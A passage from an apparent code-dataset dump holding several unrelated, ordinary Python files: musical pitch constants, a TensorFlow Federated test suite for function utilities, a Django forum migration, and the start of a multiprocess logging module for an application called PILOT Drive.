= Pitch(4,5,flat)\nFbb5 = Pitch(4,5,double/flat)\n\nG5 = Pitch(5,5,None)\nGn5 = Pitch(5,5,natural)\nGs5 = Pitch(5,5,sharp)\nGx5 = Pitch(5,5,double/sharp)\nGb5 = Pitch(5,5,flat)\nGbb5 = Pitch(5,5,double/flat)\n\nA5 = Pitch(6,5,None)\nAn5 = Pitch(6,5,natural)\nAs5 = Pitch(6,5,sharp)\nAx5 = Pitch(6,5,double/sharp)\nAb5 = Pitch(6,5,flat)\nAbb5 = Pitch(6,5,double/flat)\n\nB5 = Pitch(7,5,None)\nBn5 = Pitch(7,5,natural)\nBs5 = Pitch(7,5,sharp)\nBx5 = Pitch(7,5,double/sharp)\nBb5 = Pitch(7,5,flat)\nBbb5 = Pitch(7,5,double/flat)\n\nC6 = Pitch(1,6,None)\nCn6 = Pitch(1,6,natural)\nCs6 = Pitch(1,6,sharp)\nCx6 = Pitch(1,6,double/sharp)\nCb6 = Pitch(1,6,flat)\nCbb6 = Pitch(1,6,double/flat)\n\nD6 = Pitch(2,6,None)\nDn6 = Pitch(2,6,natural)\nDs6 = Pitch(2,6,sharp)\nDx6 = Pitch(2,6,double/sharp)\nDb6 = Pitch(2,6,flat)\nDbb6 = Pitch(2,6,double/flat)\n\nE6 = Pitch(3,6,None)\nEn6 = Pitch(3,6,natural)\nEs6 = Pitch(3,6,sharp)\nEx6 = Pitch(3,6,double/sharp)\nEb6 = Pitch(3,6,flat)\nEbb6 = Pitch(3,6,double/flat)\n\nF6 = Pitch(4,6,None)\nFn6 = Pitch(4,6,natural)\nFs6 = Pitch(4,6,sharp)\nFx6 = Pitch(4,6,double/sharp)\nFb6 = Pitch(4,6,flat)\nFbb6 = Pitch(4,6,double/flat)\n\nG6 = Pitch(5,6,None)\nGn6 = Pitch(5,6,natural)\nGs6 = Pitch(5,6,sharp)\nGx6 = Pitch(5,6,double/sharp)\nGb6 = Pitch(5,6,flat)\nGbb6 = Pitch(5,6,double/flat)\n\nA6 = Pitch(6,6,None)\nAn6 = Pitch(6,6,natural)\nAs6 = Pitch(6,6,sharp)\nAx6 = Pitch(6,6,double/sharp)\nAb6 = Pitch(6,6,flat)\nAbb6 = Pitch(6,6,double/flat)\n\nB6 = Pitch(7,6,None)\nBn6 = Pitch(7,6,natural)\nBs6 = Pitch(7,6,sharp)\nBx6 = Pitch(7,6,double/sharp)\nBb6 = Pitch(7,6,flat)\nBbb6 = Pitch(7,6,double/flat)\n\nC7 = Pitch(1,7,None)\nCn7 = Pitch(1,7,natural)\nCs7 = Pitch(1,7,sharp)\nCx7 = Pitch(1,7,double/sharp)\nCb7 = Pitch(1,7,flat)\nCbb7 = Pitch(1,7,double/flat)\n\nD7 = Pitch(2,7,None)\nDn7 = Pitch(2,7,natural)\nDs7 = Pitch(2,7,sharp)\nDx7 = Pitch(2,7,double/sharp)\nDb7 = Pitch(2,7,flat)\nDbb7 = Pitch(2,7,double/flat)\n\nE7 = Pitch(3,7,None)\nEn7 = Pitch(3,7,natural)\nEs7 = Pitch(3,7,sharp)\nEx7 = Pitch(3,7,double/sharp)\nEb7 = Pitch(3,7,flat)\nEbb7 = Pitch(3,7,double/flat)\n\nF7 = Pitch(4,7,None)\nFn7 = Pitch(4,7,natural)\nFs7 = Pitch(4,7,sharp)\nFx7 = Pitch(4,7,double/sharp)\nFb7 = Pitch(4,7,flat)\nFbb7 = Pitch(4,7,double/flat)\n\nG7 = Pitch(5,7,None)\nGn7 = Pitch(5,7,natural)\nGs7 = Pitch(5,7,sharp)\nGx7 = Pitch(5,7,double/sharp)\nGb7 = Pitch(5,7,flat)\nGbb7 = Pitch(5,7,double/flat)\n\nA7 = Pitch(6,7,None)\nAn7 = Pitch(6,7,natural)\nAs7 = Pitch(6,7,sharp)\nAx7 = Pitch(6,7,double/sharp)\nAb7 = Pitch(6,7,flat)\nAbb7 = Pitch(6,7,double/flat)\n\nB7 = Pitch(7,7,None)\nBn7 = Pitch(7,7,natural)\nBs7 = Pitch(7,7,sharp)\nBx7 = Pitch(7,7,double/sharp)\nBb7 = Pitch(7,7,flat)\nBbb7 = Pitch(7,7,double/flat)\n\nC8 = Pitch(1,8,None)\nCn8 = Pitch(1,8,natural)\nCs8 = Pitch(1,8,sharp)\nCx8 = Pitch(1,8,double/sharp)\nCb8 = Pitch(1,8,flat)\nCbb8 = Pitch(1,8,double/flat)\n\nD8 = Pitch(2,8,None)\nDn8 = Pitch(2,8,natural)\nDs8 = Pitch(2,8,sharp)\nDx8 = Pitch(2,8,double/sharp)\nDb8 = Pitch(2,8,flat)\nDbb8 = Pitch(2,8,double/flat)\n\nE8 = Pitch(3,8,None)\nEn8 = Pitch(3,8,natural)\nEs8 = Pitch(3,8,sharp)\nEx8 = Pitch(3,8,double/sharp)\nEb8 = Pitch(3,8,flat)\nEbb8 = 
Pitch(3,8,double/flat)\n\nF8 = Pitch(4,8,None)\nFn8 = Pitch(4,8,natural)\nFs8 = Pitch(4,8,sharp)\nFx8 = Pitch(4,8,double/sharp)\nFb8 = Pitch(4,8,flat)\nFbb8 = Pitch(4,8,double/flat)\n\nG8 = Pitch(5,8,None)\nGn8 = Pitch(5,8,natural)\nGs8 = Pitch(5,8,sharp)\nGx8 = Pitch(5,8,double/sharp)\nGb8 = Pitch(5,8,flat)\nGbb8 = Pitch(5,8,double/flat)\n\nA8 = Pitch(6,8,None)\nAn8 = Pitch(6,8,natural)\nAs8 = Pitch(6,8,sharp)\nAx8 = Pitch(6,8,double/sharp)\nAb8 = Pitch(6,8,flat)\nAbb8 = Pitch(6,8,double/flat)\n\nB8 = Pitch(7,8,None)\nBn8 = Pitch(7,8,natural)\nBs8 = Pitch(7,8,sharp)\nBx8 = Pitch(7,8,double/sharp)\nBb8 = Pitch(7,8,flat)\nBbb8 = Pitch(7,8,double/flat)\n\nC9 = Pitch(1,9,None)\nCn9 = Pitch(1,9,natural)\nCs9 = Pitch(1,9,sharp)\nCx9 = Pitch(1,9,double/sharp)\nCb9 = Pitch(1,9,flat)\nCbb9 = Pitch(1,9,double/flat)\n\nD9 = Pitch(2,9,None)\nDn9 = Pitch(2,9,natural)\nDs9 = Pitch(2,9,sharp)\nDx9 = Pitch(2,9,double/sharp)\nDb9 = Pitch(2,9,flat)\nDbb9 = Pitch(2,9,double/flat)\n\nE9 = Pitch(3,9,None)\nEn9 = Pitch(3,9,natural)\nEs9 = Pitch(3,9,sharp)\nEx9 = Pitch(3,9,double/sharp)\nEb9 = Pitch(3,9,flat)\nEbb9 = Pitch(3,9,double/flat)\n\nF9 = Pitch(4,9,None)\nFn9 = Pitch(4,9,natural)\nFs9 = Pitch(4,9,sharp)\nFx9 = Pitch(4,9,double/sharp)\nFb9 = Pitch(4,9,flat)\nFbb9 = Pitch(4,9,double/flat)\n\nG9 = Pitch(5,9,None)\nGn9 = Pitch(5,9,natural)\nGs9 = Pitch(5,9,sharp)\nGx9 = Pitch(5,9,double/sharp)\nGb9 = Pitch(5,9,flat)\nGbb9 = Pitch(5,9,double/flat)\n\nA9 = Pitch(6,9,None)\nAn9 = Pitch(6,9,natural)\nAs9 = Pitch(6,9,sharp)\nAx9 = Pitch(6,9,double/sharp)\nAb9 = Pitch(6,9,flat)\nAbb9 = Pitch(6,9,double/flat)\n\nB9 = Pitch(7,9,None)\nBn9 = Pitch(7,9,natural)\nBs9 = Pitch(7,9,sharp)\nBx9 = Pitch(7,9,double/sharp)\nBb9 = Pitch(7,9,flat)\nBbb9 = Pitch(7,9,double/flat)\n\n","repo_name":"Jianschang/cmat","sub_path":"pitch.py","file_name":"pitch.py","file_ext":"py","file_size_in_byte":11143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2432979497","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport inspect\nimport itertools\n\nfrom absl.testing import parameterized\nimport six\nimport tensorflow as tf\n\nfrom tensorflow.python.framework import function\nfrom tensorflow_federated.python.common_libs import anonymous_tuple\nfrom tensorflow_federated.python.common_libs import test\nfrom tensorflow_federated.python.core.api import computation_types\nfrom tensorflow_federated.python.core.impl import context_base\nfrom tensorflow_federated.python.core.impl import context_stack_impl\nfrom tensorflow_federated.python.core.impl import function_utils\nfrom tensorflow_federated.python.core.impl import type_utils\n\n\nclass NoopIngestContextForTest(context_base.Context):\n\n def ingest(self, val, type_spec):\n type_utils.check_type(val, type_spec)\n return val\n\n def invoke(self, comp, arg):\n raise NotImplementedError\n\n\nclass FuncUtilsTest(test.TestCase, parameterized.TestCase):\n\n def test_is_defun(self):\n self.assertTrue(function_utils.is_defun(function.Defun()(lambda x: None)))\n self.assertTrue(\n function_utils.is_defun(function.Defun(tf.int32)(lambda x: None)))\n self.assertFalse(function_utils.is_defun(function.Defun))\n self.assertFalse(function_utils.is_defun(lambda x: None))\n self.assertFalse(function_utils.is_defun(None))\n\n def test_get_defun_argspec_with_typed_non_eager_defun(self):\n # In a non-eager defun with a defined input signature, **kwargs or 
default\n # values are not allowed, but *args are, and the input signature may\n # overlap with *args.\n self.assertEqual(\n function_utils.get_argspec(\n function.Defun(tf.int32, tf.bool, tf.float32,\n tf.float32)(lambda x, y, *z: None)),\n inspect.ArgSpec(\n args=['x', 'y'], varargs='z', keywords=None, defaults=None))\n\n def test_get_defun_argspec_with_untyped_non_eager_defun(self):\n # In a non-eager defun with no input signature, the same restrictions as in\n # a typed defun apply.\n self.assertEqual(\n function_utils.get_argspec(function.Defun()(lambda x, y, *z: None)),\n inspect.ArgSpec(\n args=['x', 'y'], varargs='z', keywords=None, defaults=None))\n\n # pyformat: disable\n @parameterized.parameters(\n itertools.product(\n # Values of 'fn' to test.\n [lambda: None,\n lambda a: None,\n lambda a, b: None,\n lambda *a: None,\n lambda **a: None,\n lambda *a, **b: None,\n lambda a, *b: None,\n lambda a, **b: None,\n lambda a, b, **c: None,\n lambda a, b=10: None,\n lambda a, b=10, c=20: None,\n lambda a, b=10, *c: None,\n lambda a, b=10, **c: None,\n lambda a, b=10, *c, **d: None,\n lambda a, b, c=10, *d: None,\n lambda a=10, b=20, c=30, **d: None],\n # Values of 'args' to test.\n [[], [1], [1, 2], [1, 2, 3], [1, 2, 3, 4]],\n # Values of 'kwargs' to test.\n [{}, {'b': 100}, {'name': 'foo'}, {'b': 100, 'name': 'foo'}]))\n # pyformat: enable\n def test_get_callargs_for_argspec(self, fn, args, kwargs):\n argspec = inspect.getargspec(fn) # pylint: disable=deprecated-method\n expected_error = None\n try:\n expected_callargs = inspect.getcallargs(fn, *args, **kwargs) # pylint: disable=deprecated-method\n except TypeError as e:\n expected_error = e\n expected_callargs = None\n try:\n if expected_error is None:\n result_callargs = function_utils.get_callargs_for_argspec(\n argspec, *args, **kwargs)\n self.assertEqual(result_callargs, expected_callargs)\n else:\n with self.assertRaises(TypeError):\n result_callargs = function_utils.get_callargs_for_argspec(\n argspec, *args, **kwargs)\n except (TypeError, AssertionError) as test_err:\n raise AssertionError(\n 'With argspec {}, args {}, kwargs {}, expected callargs {} and '\n 'error {}, tested function returned {} and the test has failed '\n 'with message: {}'.format(\n str(argspec), str(args), str(kwargs), str(expected_callargs),\n str(expected_error), str(result_callargs), str(test_err)))\n\n # pyformat: disable\n # pylint: disable=g-complex-comprehension\n @parameterized.parameters(\n (inspect.getargspec(params[0]),) + params[1:] # pylint: disable=deprecated-method\n for params in [\n (lambda a: None, [tf.int32], {}, True),\n (lambda a=True: None, [tf.int32], {}, False),\n (lambda a, b=True: None, [tf.int32, tf.bool], {}, True),\n (lambda a, b=True: None, [tf.int32], {'b': tf.bool}, True),\n (lambda a, b=True: None, [tf.bool], {'b': tf.bool}, True),\n (lambda a=10, b=True: None, [tf.int32], {'b': tf.bool}, True),\n (lambda a=10, b=True: None, [tf.bool], {'b': tf.bool}, False)]\n )\n # pylint: enable=g-complex-comprehension\n # pyformat: enable\n def test_is_argspec_compatible_with_types(self, argspec, args, kwargs,\n expected_result):\n self.assertEqual(\n function_utils.is_argspec_compatible_with_types(\n argspec, *[computation_types.to_type(a) for a in args], **{\n k: computation_types.to_type(v)\n for k, v in six.iteritems(kwargs)\n }), expected_result)\n\n # pyformat: disable\n @parameterized.parameters(\n (tf.int32, False),\n ([tf.int32, tf.int32], True),\n ([tf.int32, ('b', tf.int32)], True),\n ([('a', tf.int32), ('b', tf.int32)], 
True),\n ([('a', tf.int32), tf.int32], False),\n (anonymous_tuple.AnonymousTuple([(None, 1), ('a', 2)]), True),\n (anonymous_tuple.AnonymousTuple([('a', 1), (None, 2)]), False))\n # pyformat: enable\n def test_is_argument_tuple(self, arg, expected_result):\n self.assertEqual(function_utils.is_argument_tuple(arg), expected_result)\n\n # pyformat: disable\n @parameterized.parameters(\n (anonymous_tuple.AnonymousTuple([(None, 1)]), [1], {}),\n (anonymous_tuple.AnonymousTuple([(None, 1), ('a', 2)]), [1], {'a': 2}))\n # pyformat: enable\n def test_unpack_args_from_anonymous_tuple(self, tuple_with_args,\n expected_args, expected_kwargs):\n self.assertEqual(\n function_utils.unpack_args_from_tuple(tuple_with_args),\n (expected_args, expected_kwargs))\n\n # pyformat: disable\n @parameterized.parameters(\n ([tf.int32], [tf.int32], {}),\n ([('a', tf.int32)], [], {'a': tf.int32}),\n ([tf.int32, tf.bool], [tf.int32, tf.bool], {}),\n ([tf.int32, ('b', tf.bool)], [tf.int32], {'b': tf.bool}),\n ([('a', tf.int32), ('b', tf.bool)], [], {'a': tf.int32, 'b': tf.bool}))\n # pyformat: enable\n def test_unpack_args_from_tuple_type(self, tuple_with_args, expected_args,\n expected_kwargs):\n args, kwargs = function_utils.unpack_args_from_tuple(tuple_with_args)\n self.assertEqual(len(args), len(expected_args))\n for idx, arg in enumerate(args):\n self.assertTrue(\n type_utils.are_equivalent_types(\n arg, computation_types.to_type(expected_args[idx])))\n self.assertEqual(set(kwargs.keys()), set(expected_kwargs.keys()))\n for k, v in six.iteritems(kwargs):\n self.assertTrue(\n type_utils.are_equivalent_types(\n computation_types.to_type(v), expected_kwargs[k]))\n\n def test_pack_args_into_anonymous_tuple_without_type_spec(self):\n self.assertEqual(\n function_utils.pack_args_into_anonymous_tuple([1], {'a': 10}),\n anonymous_tuple.AnonymousTuple([(None, 1), ('a', 10)]))\n self.assertIn(\n function_utils.pack_args_into_anonymous_tuple([1, 2], {\n 'a': 10,\n 'b': 20\n }), [\n anonymous_tuple.AnonymousTuple([\n (None, 1),\n (None, 2),\n ('a', 10),\n ('b', 20),\n ]),\n anonymous_tuple.AnonymousTuple([\n (None, 1),\n (None, 2),\n ('b', 20),\n ('a', 10),\n ])\n ])\n self.assertIn(\n function_utils.pack_args_into_anonymous_tuple([], {\n 'a': 10,\n 'b': 20\n }), [\n anonymous_tuple.AnonymousTuple([('a', 10), ('b', 20)]),\n anonymous_tuple.AnonymousTuple([('b', 20), ('a', 10)])\n ])\n self.assertEqual(\n function_utils.pack_args_into_anonymous_tuple([1], {}),\n anonymous_tuple.AnonymousTuple([(None, 1)]))\n\n # pyformat: disable\n @parameterized.parameters(\n ([1], {}, [tf.int32], [(None, 1)]),\n ([1, True], {}, [tf.int32, tf.bool], [(None, 1), (None, True)]),\n ([1, True], {}, [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]),\n ([1], {'y': True}, [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]),\n ([], {'x': 1, 'y': True}, [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]),\n ([], collections.OrderedDict([('y', True), ('x', 1)]),\n [('x', tf.int32), ('y', tf.bool)],\n [('x', 1), ('y', True)]))\n # pyformat: enable\n def test_pack_args_into_anonymous_tuple_with_type_spec_expect_success(\n self, args, kwargs, type_spec, elements):\n self.assertEqual(\n function_utils.pack_args_into_anonymous_tuple(\n args, kwargs, type_spec, NoopIngestContextForTest()),\n anonymous_tuple.AnonymousTuple(elements))\n\n # pyformat: disable\n @parameterized.parameters(\n ([1], {}, [(tf.bool)]),\n ([], {'x': 1, 'y': True}, [(tf.int32), (tf.bool)]))\n # pyformat: enable\n def 
test_pack_args_into_anonymous_tuple_with_type_spec_expect_failure(\n self, args, kwargs, type_spec):\n with self.assertRaises(TypeError):\n function_utils.pack_args_into_anonymous_tuple(args, kwargs, type_spec,\n NoopIngestContextForTest())\n\n # pyformat: disable\n @parameterized.parameters(\n (None, [], {}, 'None'),\n (tf.int32, [1], {}, '1'),\n ([tf.int32, tf.bool], [1, True], {}, '<1,True>'),\n ([('x', tf.int32), ('y', tf.bool)], [1, True], {}, '<x=1,y=True>'),\n ([('x', tf.int32), ('y', tf.bool)], [1], {'y': True}, '<x=1,y=True>'),\n ([tf.int32, tf.bool],\n [anonymous_tuple.AnonymousTuple([(None, 1), (None, True)])], {},\n '<1,True>'))\n # pyformat: enable\n def test_pack_args(self, parameter_type, args, kwargs, expected_value_string):\n self.assertEqual(\n str(\n function_utils.pack_args(parameter_type, args, kwargs,\n NoopIngestContextForTest())),\n expected_value_string)\n\n # pyformat: disable\n @parameterized.parameters(\n (1, lambda: 10, None, None, None, 10),\n (2, lambda x=1: x + 10, None, None, None, 11),\n (3, lambda x=1: x + 10, tf.int32, None, 20, 30),\n (4, lambda x, y: x + y, [tf.int32, tf.int32], None,\n anonymous_tuple.AnonymousTuple([('x', 5), ('y', 6)]), 11),\n (5, lambda *args: str(args), [tf.int32, tf.int32], True,\n anonymous_tuple.AnonymousTuple([(None, 5), (None, 6)]), '(5, 6)'),\n (6, lambda *args: str(args), [('x', tf.int32), ('y', tf.int32)], False,\n anonymous_tuple.AnonymousTuple([('x', 5), ('y', 6)]),\n '(AnonymousTuple([(x, 5), (y, 6)]),)'),\n (7, lambda x: str(x), # pylint: disable=unnecessary-lambda\n [tf.int32], None, anonymous_tuple.AnonymousTuple([(None, 10)]), '<10>'))\n # pyformat: enable\n def test_wrap_as_zero_or_one_arg_callable(self, unused_index, fn,\n parameter_type, unpack, arg,\n expected_result):\n wrapped_fn = function_utils.wrap_as_zero_or_one_arg_callable(\n fn, parameter_type, unpack)\n actual_result = wrapped_fn(arg) if parameter_type else wrapped_fn()\n self.assertEqual(actual_result, expected_result)\n\n def test_polymorphic_function(self):\n\n class ContextForTest(context_base.Context):\n\n def ingest(self, val, type_spec):\n return val\n\n def invoke(self, comp, arg):\n return 'name={},type={},arg={}'.format(\n comp.name, str(comp.type_signature.parameter), str(arg))\n\n class TestFunction(function_utils.ConcreteFunction):\n\n def __init__(self, name, parameter_type):\n self._name = name\n super(TestFunction, self).__init__(\n computation_types.FunctionType(parameter_type, tf.string),\n context_stack_impl.context_stack)\n\n @property\n def name(self):\n return self._name\n\n class TestFunctionFactory(object):\n\n def __init__(self):\n self._count = 0\n\n def __call__(self, parameter_type):\n self._count = self._count + 1\n return TestFunction(str(self._count), parameter_type)\n\n with context_stack_impl.context_stack.install(ContextForTest()):\n fn = function_utils.PolymorphicFunction(TestFunctionFactory())\n self.assertEqual(fn(10), 'name=1,type=<int32>,arg=<10>')\n self.assertEqual(\n fn(20, x=True), 'name=2,type=<int32,x=bool>,arg=<20,x=True>')\n self.assertEqual(fn(True), 'name=3,type=<bool>,arg=<True>')\n self.assertEqual(\n fn(30, x=40), 'name=4,type=<int32,x=int32>,arg=<30,x=40>')\n self.assertEqual(fn(50), 'name=1,type=<int32>,arg=<50>')\n self.assertEqual(\n fn(0, x=False), 'name=2,type=<int32,x=bool>,arg=<0,x=False>')\n self.assertEqual(fn(False), 'name=3,type=<bool>,arg=<False>')\n self.assertEqual(\n fn(60, x=70), 'name=4,type=<int32,x=int32>,arg=<60,x=70>')\n\n def test_concrete_function(self):\n\n class 
ContextForTest(context_base.Context):\n\n def ingest(self, val, type_spec):\n return val\n\n def invoke(self, comp, arg):\n return comp.invoke_fn(arg)\n\n class TestFunction(function_utils.ConcreteFunction):\n\n def __init__(self, type_signature, invoke_fn):\n super(TestFunction, self).__init__(type_signature,\n context_stack_impl.context_stack)\n self._invoke_fn = invoke_fn\n\n def invoke_fn(self, arg):\n return self._invoke_fn(arg)\n\n with context_stack_impl.context_stack.install(ContextForTest()):\n fn = TestFunction(\n computation_types.FunctionType(tf.int32, tf.bool), lambda x: x > 10)\n self.assertEqual(fn(5), False)\n self.assertEqual(fn(15), True)\n\n fn = TestFunction(\n computation_types.FunctionType([('x', tf.int32), ('y', tf.int32)],\n tf.bool), lambda arg: arg.x > arg.y)\n self.assertEqual(fn(5, 10), False)\n self.assertEqual(fn(10, 5), True)\n self.assertEqual(fn(y=10, x=5), False)\n self.assertEqual(fn(y=5, x=10), True)\n self.assertEqual(fn(10, y=5), True)\n\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"abogdanova/FedMed","sub_path":"federated-0.4.0/tensorflow_federated/python/core/impl/function_utils_test.py","file_name":"function_utils_test.py","file_ext":"py","file_size_in_byte":14948,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"24630668588","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport autoslug.fields\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('core', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('text', models.TextField(verbose_name='Answer')),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255, verbose_name='Title')),\n ('text', models.TextField(verbose_name='Question')),\n ('slug', autoslug.fields.AutoSlugField(editable=False, populate_from=b'title', unique=True, verbose_name='Slug')),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('hidden', models.BooleanField(default=False, verbose_name='Hidden')),\n ('hidden_justification', models.TextField(default=None, null=True, verbose_name='Justification', blank=True)),\n ('correct_answer', models.OneToOneField(related_name='+', null=True, blank=True, to='forum.Answer', verbose_name='Correct answer')),\n ('course', models.ForeignKey(verbose_name='Course', to='core.Course')),\n ('hidden_by', models.ForeignKey(related_name='hidden_questions', default=None, blank=True, to=settings.AUTH_USER_MODEL, null=True, verbose_name='User')),\n ('lesson', models.ForeignKey(related_name='forum_questions', verbose_name='Lesson', blank=True, to='core.Lesson', null=True)),\n ('user', models.ForeignKey(related_name='forum_questions', verbose_name='User', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField(auto_now=True)),\n ('value', models.IntegerField(default=0)),\n ],\n ),\n migrations.CreateModel(\n 
name='AnswerVote',\n fields=[\n ('vote_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='forum.Vote')),\n ],\n bases=('forum.vote',),\n ),\n migrations.CreateModel(\n name='QuestionVote',\n fields=[\n ('vote_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='forum.Vote')),\n ('question', models.ForeignKey(related_name='votes', verbose_name='Question', to='forum.Question')),\n ],\n bases=('forum.vote',),\n ),\n migrations.AddField(\n model_name='vote',\n name='user',\n field=models.ForeignKey(verbose_name='User', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(related_name='answers', verbose_name='Question', to='forum.Question'),\n ),\n migrations.AddField(\n model_name='answer',\n name='user',\n field=models.ForeignKey(related_name='forum_answers', verbose_name='User', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='answervote',\n name='answer',\n field=models.ForeignKey(related_name='votes', verbose_name='Answer', to='forum.Answer'),\n ),\n ]\n","repo_name":"hacklabr/timtec","sub_path":"forum/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"40"} +{"seq_id":"16603017108","text":"\"\"\"\nThis module handles logging across PILOT Drive and is multiprocess friendly.\n\"\"\"\n\nimport inspect\nimport logging\nimport os\nimport time\nfrom multiprocessing import Manager\nfrom typing import Callable\n\nfrom pilot_drive.constants import DEFAULT_LOG_SETTINGS, LOG_FILE_NAME, absolute_path\n\n\nclass MasterLogger:\n \"\"\"\n The class that handles the logger for the entire application, allowing for logging across\n multiple processes via the queue\n \"\"\"\n\n def __init__(self, log_settings: dict) -> None:\n \"\"\"\n Initialize the logger\n\n :param log_settings: a dict of logger settings, ie:\n {\"logLevel\": <0-50>, \"logToFile\": <bool>, \"logPath\": <LOG PATH>\"}.\n the :func: `~pilot_drive.services.Settings.get_raw_settings` can be used to supply this\n \"\"\"\n manager = Manager()\n self.__logging_queue = manager.Queue()\n self.__new_log = manager.Value(\"i\", 0)\n self.logger: logging.Logger = self.__initialize_logger(log_settings)\n\n def __initialize_logger(self, log_settings) -> logging.Logger:\n \"\"\"\n Initialized the logger and its configurations based on the log_settings dict\n\n :param log_settings: a dict of logger settings, ie:\n {\"logLevel\": <0-50>, \"logToFile\": <bool>, \"logPath\": <LOG PATH>\"}.\n the :func: `~pilot_drive.services.Settings.get_raw_settings` can be used to supply this\n :return: an instance of logging.Logger\n \"\"\"\n init_errors = (\n []\n ) # Append any errors to a list to be logged after logger initialization\n\n try:\n log_level = log_settings[\"logLevel\"]\n log_to_file = log_settings[\"logToFile\"]\n if log_to_file is True:\n log_path = log_settings[\"logPath\"]\n except KeyError as err:\n init_errors.append(\n \"Failed to retrieve logging value from settings: \" + str(err)\n )\n log_level = DEFAULT_LOG_SETTINGS[\"logLevel\"]\n log_to_file = DEFAULT_LOG_SETTINGS[\"logToFile\"]\n if log_to_file is True:\n log_path = log_settings[\"logPath\"]\n\n if log_to_file is True:\n # checks if the user specified the log path with file specified\n # (ie. /etc/pilot-drive/yeet.log) or just a directory path (ie. 
/etc/pilot-drive/)\n if log_path == \"\":\n log_path = DEFAULT_LOG_SETTINGS[\"logPath\"]\n\n if log_path[-1] == \"/\":\n log_path = f\"{log_path}{LOG_FILE_NAME}\"\n\n dir_path = log_path.split(\"/\")[:-1]\n dir_path = \"/\".join(dir_path)\n os.makedirs(name=dir_path, exist_ok=True)\n\n logging.basicConfig(\n filename=log_path,\n format=\"%(asctime)s:%(levelname)s:%(message)s\",\n datefmt=\"%m/%d/%Y-%H:%M:%S\",\n level=log_level,\n )\n\n # Disable the loggers of unintended services like websocket & asyncio...\n logging.getLogger(\"asyncio\").setLevel(logging.ERROR)\n logging.getLogger(\"asyncio.coroutines\").setLevel(logging.ERROR)\n logging.getLogger(\"websockets.server\").setLevel(logging.ERROR)\n logging.getLogger(\"websockets.protocol\").setLevel(logging.ERROR)\n logger = logging.getLogger(__name__)\n return logger\n\n # Logic/APIs for services. Goal was to make it close to the feel of the logging module. Just\n # needs origin.\n\n def __add_to_queue(self, level: int, origin: str, msg: str) -> None:\n \"\"\"\n Add the logging event to the multiprocessing queue\n\n :param level: the logging level of the event ie. (0-50)\n :param origin: the origin of the logging event\n :param msg: the logging event\n \"\"\"\n log_dict = {\"level\": level, \"origin\": origin, \"message\": msg}\n self.__logging_queue.put(item=log_dict)\n self.__new_log.value = 1 # Indicate there is a new log value in the queue\n\n # pylint: disable=no-self-argument\n def __log_handler(self, level: int, msg: str) -> Callable:\n \"\"\"\n Handles the incoming logging event and adds it to the queue.\n\n :param level: the intended log level ie. (0-50)\n \"\"\"\n # Get the calling origin and format it to look like the typical logger call.\n origin = (\n inspect.stack()[2]\n .filename.replace(\"/main.py\", \"/__main__\")\n .replace(absolute_path, \"\")\n .replace(\"/\", \".\")\n .replace(\".py\", \"\")\n ) # Daisy chaining replace statements sucks. TODO: Use RegEx here.\n self.__add_to_queue(level=level, origin=origin, msg=msg)\n\n # Attempt to make the logging feel as close to the stock library as possible\n def critical(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'CRITICAL'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.CRITICAL, msg=msg)\n\n def error(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'ERROR'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.ERROR, msg=msg)\n\n def warning(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'WARNING'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.WARNING, msg=msg)\n\n def info(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'INFO'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.INFO, msg=msg)\n\n def debug(self, msg: str) -> None:\n \"\"\"\n Log 'msg' with severity 'DEBUG'.\n\n :param msg: The message to be logged\n \"\"\"\n self.__log_handler(logging.DEBUG, msg=msg)\n\n # Logic for actually logging.\n\n def __log(self, level: int, origin: str, message: str) -> None:\n \"\"\"\n Output the log with the :func:`~logging.Logger.log` method\n\n :param level: the logging level of the event ie. 
